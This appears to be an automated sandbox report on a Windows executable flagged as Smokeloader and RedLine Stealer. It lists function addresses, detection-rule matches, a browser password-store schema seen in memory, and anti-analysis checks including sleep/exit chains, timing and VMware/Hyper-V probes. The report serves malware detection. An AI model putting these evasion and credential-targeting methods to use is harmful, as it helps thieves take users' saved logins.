                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040620B0_2_0040620B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004302280_2_00430228
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004052D90_2_004052D9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00436ADC0_2_00436ADC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00405AAA0_2_00405AAA
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043B3620_2_0043B362
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004024760_2_00402476
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042FD350_2_0042FD35
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042AD820_2_0042AD82
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042D6580_2_0042D658
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00430E6C0_2_00430E6C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00438E280_2_00438E28
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042CFBA0_2_0042CFBA
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041204D0_2_0041204D
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004410570_2_00441057
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004150700_2_00415070
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004488000_2_00448800
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043D8D00_2_0043D8D0
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041E0830_2_0041E083
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044915B0_2_0044915B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0045D15A0_2_0045D15A
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041316D0_2_0041316D
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040112C0_2_0040112C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004279E00_2_004279E0
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041D1E90_2_0041D1E9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004109FC0_2_004109FC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040D9940_2_0040D994
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044F2440_2_0044F244
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041AA490_2_0041AA49
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041B2510_2_0041B251
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00429A5B0_2_00429A5B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004102180_2_00410218
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00410A330_2_00410A33
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00414A830_2_00414A83
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044234A0_2_0044234A
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040136E0_2_0040136E
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00457B300_2_00457B30
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004283340_2_00428334
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041EBEB0_2_0041EBEB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00415C7E0_2_00415C7E
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004184130_2_00418413
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043A4FE0_2_0043A4FE
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00424C8D0_2_00424C8D
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043BCA40_2_0043BCA4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004165480_2_00416548
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004395350_2_00439535
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041764A0_2_0041764A
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043D6000_2_0043D600
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004126B90_2_004126B9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004297300_2_00429730
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00434FAC0_2_00434FAC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235D2210_2_0235D221
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023652130_2_02365213
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02378A670_2_02378A67
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023422B40_2_023422B4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023712BE0_2_023712BE
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0233BA830_2_0233BA83
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023642E70_2_023642E7
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234E2EA0_2_0234E2EA
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023452D70_2_023452D7
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02359ADA0_2_02359ADA
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236DB370_2_0236DB37
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235C3410_2_0235C341
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0233E3B50_2_0233E3B5
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0233B3900_2_0233B390
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0233AB8F0_2_0233AB8F
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023603F50_2_023603F5
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0233DBFB0_2_0233DBFB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023433D40_2_023433D4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023793C20_2_023793C2
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0238D3C10_2_0238D3C1
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023478B10_2_023478B1
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235D8BF0_2_0235D8BF
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236908F0_2_0236908F
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023610D30_2_023610D3
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023429200_2_02342920
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023599970_2_02359997
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234EE520_2_0234EE52
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354EF40_2_02354EF4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02345EE50_2_02345EE5
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02359EE20_2_02359EE2
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023326DD0_2_023326DD
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236BF0B0_2_0236BF0B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023467AF0_2_023467AF
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236979C0_2_0236979C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235AFE90_2_0235AFE9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235BC2C0_2_0235BC2C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02336C080_2_02336C08
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234FC0B0_2_0234FC0B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023364720_2_02336472
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234047F0_2_0234047F
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234D4500_2_0234D450
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02357C470_2_02357C47
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234ACB00_2_0234ACB0
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234B4B80_2_0234B4B8
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0237F4AB0_2_0237F4AB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236048F0_2_0236048F
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234C4D70_2_0234C4D7
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235F4DF0_2_0235F4DF
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02359CC20_2_02359CC2
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02335D110_2_02335D11
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023355400_2_02335540
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02366D430_2_02366D43
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023725B10_2_023725B1
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235859B0_2_0235859B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235A5D40_2_0235A5D4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236B5C90_2_0236B5C9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess token adjusted: Load DriverJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 0233E3B5 appears 36 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 00438E28 appears 39 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 0043D070 appears 51 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 0040E14E appears 52 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 0236D2D7 appears 48 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 004360E1 appears 144 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: String function: 0233A905 appears 38 times
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 1708
                    Source: g1kWKm20Z5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_008ADB56 CreateToolhelp32Snapshot,Module32First,0_2_008ADB56
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1352
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f4130565-fae2-4d2b-bb39-55413c018c92Jump to behavior
                    Source: g1kWKm20Z5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: g1kWKm20Z5.exeReversingLabs: Detection: 89%
                    Source: unknownProcess created: C:\Users\user\Desktop\g1kWKm20Z5.exe "C:\Users\user\Desktop\g1kWKm20Z5.exe"
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 1708
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: my-global-render.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeUnpacked PE file: 0.2.g1kWKm20Z5.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeUnpacked PE file: 0.2.g1kWKm20Z5.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00464074 push B000468Ch; retn 0044h0_2_00464079
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00463CAD push esi; ret 0_2_00463CB6
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h0_2_00403D71
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00452768 push ecx; ret 0_2_0045277B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023829CF push ecx; ret 0_2_023829E2
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02333FD3 push eax; mov dword ptr [esp], 00000000h0_2_02333FD8
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02332260 Sleep,ExitProcess,0_2_02332260
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_0-72481
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-72423
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-72573
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-72589
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_0-72523
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-72531
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02382223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_02382223
                    Source: Amcache.hve.7.drBinary or memory string: VMware
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
